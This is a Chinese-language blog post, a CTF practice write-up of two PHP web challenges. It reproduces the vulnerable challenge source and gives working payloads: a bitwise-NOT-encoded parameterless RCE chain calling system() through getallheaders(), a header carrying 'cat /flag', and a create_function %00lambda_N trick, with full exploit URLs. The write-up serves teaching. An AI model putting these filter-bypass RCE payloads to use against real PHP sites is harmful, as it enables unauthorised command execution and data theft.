<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.14.0/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css">

<script class="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"-181.github.io","root":"/","scheme":"Pisces","version":"8.0.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}};
  </script>

  <meta name="description" content="guojingming题目源码： 1234567891011&lt;?phpshow_source(__FILE__);    $code &#x3D; $_GET[&amp;#x27;code&amp;#x27;];    if(strlen($code) &gt; 70 or preg_match(&amp;#x27;&#x2F;[A-Za-z0-9]|\&amp;#x27;|&quot;|&#96;|\ |,|\.|-|\+|&#x3D;|\&#x2F;|\\|&lt;">
<meta property="og:type" content="article">
<meta property="og:title" content="guojingming和easyphp20201216">
<meta property="og:url" content="https://-181.github.io/2020/12/18/guojingming%E5%92%8Ceasyphp20201216/index.html">
<meta property="og:site_name" content="左">
<meta property="og:description" content="guojingming题目源码： 1234567891011&lt;?phpshow_source(__FILE__);    $code &#x3D; $_GET[&amp;#x27;code&amp;#x27;];    if(strlen($code) &gt; 70 or preg_match(&amp;#x27;&#x2F;[A-Za-z0-9]|\&amp;#x27;|&quot;|&#96;|\ |,|\.|-|\+|&#x3D;|\&#x2F;|\\|&lt;">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://chen-lishan.gitee.io/tuc/%E9%83%AD%E6%95%AC%E6%98%8E/%E5%8F%96%E5%8F%8D.png">
<meta property="og:image" content="https://chen-lishan.gitee.io/tuc/%E9%A2%98%E7%9B%AE/%E5%8A%A8%E6%80%81%E6%9E%84%E9%80%A0.png">
<meta property="og:image" content="https://chen-lishan.gitee.io/tuc/%E9%83%AD%E6%95%AC%E6%98%8E/flag.png">
<meta property="og:image" content="https://chen-lishan.gitee.io/tuc/%E9%A2%98%E7%9B%AE/easy2020.png">
<meta property="og:image" content="https://chen-lishan.gitee.io/tuc/%E9%A2%98%E7%9B%AE/easy2020%20flag.png">
<meta property="article:published_time" content="2020-12-17T16:00:00.000Z">
<meta property="article:modified_time" content="2020-12-19T13:16:53.626Z">
<meta property="article:author" content="左">
<meta property="article:tag" content="练习">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://chen-lishan.gitee.io/tuc/%E9%83%AD%E6%95%AC%E6%98%8E/%E5%8F%96%E5%8F%8D.png">


<link rel="canonical" href="https://-181.github.io/2020/12/18/guojingming%E5%92%8Ceasyphp20201216/">


<script class="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>guojingming和easyphp20201216 | 左</title>
  






  <noscript>
  <style>
  body { margin-top: 2rem; }

  .use-motion .menu-item,
  .use-motion .sidebar,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header {
    visibility: visible;
  }

  .use-motion .header,
  .use-motion .site-brand-container .toggle,
  .use-motion .footer { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle,
  .use-motion .custom-logo-image {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line {
    transform: scaleX(1);
  }

  .search-pop-overlay, .sidebar-nav { display: none; }
  .sidebar-panel { display: block; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">左</h1>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">春有百花秋有月， 夏有凉风冬有雪</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
        
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <section class="post-toc-wrap sidebar-panel">
          <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#guojingming"><span class="nav-number">1.</span> <span class="nav-text">guojingming</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#easyphp20201216"><span class="nav-number">2.</span> <span class="nav-text">easyphp20201216</span></a></li></ol></div>
      </section>
      <!--/noindex-->

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="左"
      src="/image/avatar.jpg">
  <p class="site-author-name" itemprop="name">左</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">12</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </section>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">
      

      

  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://-181.github.io/2020/12/18/guojingming%E5%92%8Ceasyphp20201216/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/image/avatar.jpg">
      <meta itemprop="name" content="左">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="左">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          guojingming和easyphp20201216
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2020-12-18 00:00:00" itemprop="dateCreated datePublished" datetime="2020-12-18T00:00:00+08:00">2020-12-18</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2020-12-19 21:16:53" itemprop="dateModified" datetime="2020-12-19T21:16:53+08:00">2020-12-19</time>
      </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h2 id="guojingming"><a href="#guojingming" class="headerlink" title="guojingming"></a>guojingming</h2><p>题目源码：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line">    $code = $_GET[<span class="string">&#x27;code&#x27;</span>];</span><br><span class="line">    <span class="keyword">if</span>(strlen($code) &gt; <span class="number">70</span> <span class="keyword">or</span> preg_match(<span class="string">&#x27;/[A-Za-z0-9]|\&#x27;|&quot;|`|\ |,|\.|-|\+|=|\/|\\|&lt;|&gt;|\$|\?|\^|&amp;|\|/is&#x27;</span>,$code))&#123;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">&#x27;Your Guojingming&#x27;</span>);</span><br><span class="line">    &#125;<span class="keyword">else</span> <span class="keyword">if</span>(<span class="string">&#x27;;&#x27;</span> === preg_replace(<span class="string">&#x27;/[^\s\(\)]+?\((?R)?\)/&#x27;</span>, <span class="string">&#x27;&#x27;</span>, $code))&#123;</span><br><span class="line">        @<span class="keyword">eval</span>($code);</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span> </span><br></pre></td></tr></table></figure>

<p>\：意思是过滤</p>
<p>|：相当于“与”</p>
<p>if语句：大小写字母、数字及许多字符都会被过滤。</p>
<ul>
<li>无参数RCE</li>
</ul>
<p>用getallheaders()函数来读取flag：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo(system(end(getallheaders()))); </span><br></pre></td></tr></table></figure>

<p>但是字母会被过滤，因此需要对这些字母进行取反</p>
<ul>
<li>取反</li>
</ul>
<p>比如system：</p>
<p><img src="https://chen-lishan.gitee.io/tuc/%E9%83%AD%E6%95%AC%E6%98%8E/%E5%8F%96%E5%8F%8D.png"></p>
<p>注：对echo取反需要加上单引号，而其他函数可加可不加</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line">$a&#x3D;(~&#39;system&#39;);</span><br><span class="line"></span><br><span class="line">echo urlencode($a);</span><br></pre></td></tr></table></figure>

<p>以此类推</p>
<ul>
<li>动态构造函数</li>
</ul>
<p>php二维数组能够构造字符串，如：<code>[&#39;phpinfo&#39;][false] </code>可以构建一个字符串 <code>&quot;phpinfo&quot;</code></p>
<p><img src="https://chen-lishan.gitee.io/tuc/%E9%A2%98%E7%9B%AE/%E5%8A%A8%E6%80%81%E6%9E%84%E9%80%A0.png"></p>
<p>最终输入网址：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;47.98.234.232:28004&#x2F;?code&#x3D;[~%8F%8D%96%91%8B%A0%8D][!%FF]([~%8C%86%8C%8B%9A%92][!%FF]([~%9A%91%9B][!%FF]([~%98%9A%8B%9E%93%93%97%9A%9E%9B%9A%8D%8C][!%FF]())));</span><br></pre></td></tr></table></figure>

<p>PS：~：取反符号</p>
<p>不知为何，抓包后用Burp Suite无法获取flag，于是尝试用HackBar，在Add Header中，输入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Upgrade-Insecure-Requests: cat &#x2F;flag</span><br></pre></td></tr></table></figure>

<p>之前做过类似的题，输入的是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat flag.php</span><br></pre></td></tr></table></figure>

<p>而这道题用这个却做不了。flag可以理解为存在于一个文件中，而这道题的flag所在的文件名为flag。一般地，若没有提示，文件名为flag，或者flag.php，可以进行尝试。</p>
<p>刷新页面，可以得到flag：</p>
<p><img src="https://chen-lishan.gitee.io/tuc/%E9%83%AD%E6%95%AC%E6%98%8E/flag.png"></p>
<h2 id="easyphp20201216"><a href="#easyphp20201216" class="headerlink" title="easyphp20201216"></a>easyphp20201216</h2><p>题目源码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">show_source(__FILE__);</span><br><span class="line">$a &#x3D; create_function(&quot;&quot;, &quot;echo(&#96;cat &#x2F;flag&#96;);&quot;);</span><br><span class="line">if(isset($_GET[&#39;a&#39;]))&#123;</span><br><span class="line">     $_GET[&#39;a&#39;]();</span><br><span class="line">&#125;</span><br><span class="line">?&gt; </span><br></pre></td></tr></table></figure>

<p>解题思路：先将$a打印出来，然后就可以得到flag。</p>
<p>这里可以看到<code>create_function()</code>这个函数漏洞，它create之后会自动生成函数<code>%00lambda_%d</code></p>
<p>将题目代码复制到Sublime，并加入语句<code>echo $a;</code>运行之后，就可以得到<code>%00lambda_%d</code></p>
<p>每刷新一次，$a的lambda_0后面的数都会加1</p>
<p><img src="https://chen-lishan.gitee.io/tuc/%E9%A2%98%E7%9B%AE/easy2020.png"></p>
<p>输入网址：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;47.98.234.232:28042&#x2F;?a&#x3D;%00lambda_1</span><br></pre></td></tr></table></figure>

<p>得到flag：</p>
<p><img src="https://chen-lishan.gitee.io/tuc/%E9%A2%98%E7%9B%AE/easy2020%20flag.png"></p>

    </div>

    
    
    

    <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E7%BB%83%E4%B9%A0/" rel="tag"># 练习</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2020/11/30/SSRF%E6%BC%8F%E6%B4%9E/" rel="prev" title="SSRF漏洞">
                  <i class="fa fa-chevron-left"></i> SSRF漏洞
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2020/12/23/%E5%85%B3%E4%BA%8EDocker%E7%9A%84%E4%B8%80%E4%BA%9B%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/" rel="next" title="关于Docker的一些基础知识">
                  关于Docker的一些基础知识 <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






      

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      const activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      const commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

    </div>
  </main>

  <footer class="footer">
    <div class="footer-inner">
      

      

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">左</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script src="//cdn.jsdelivr.net/npm/animejs@3.2.0/lib/anime.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  


















  








  

  

</body>
</html>
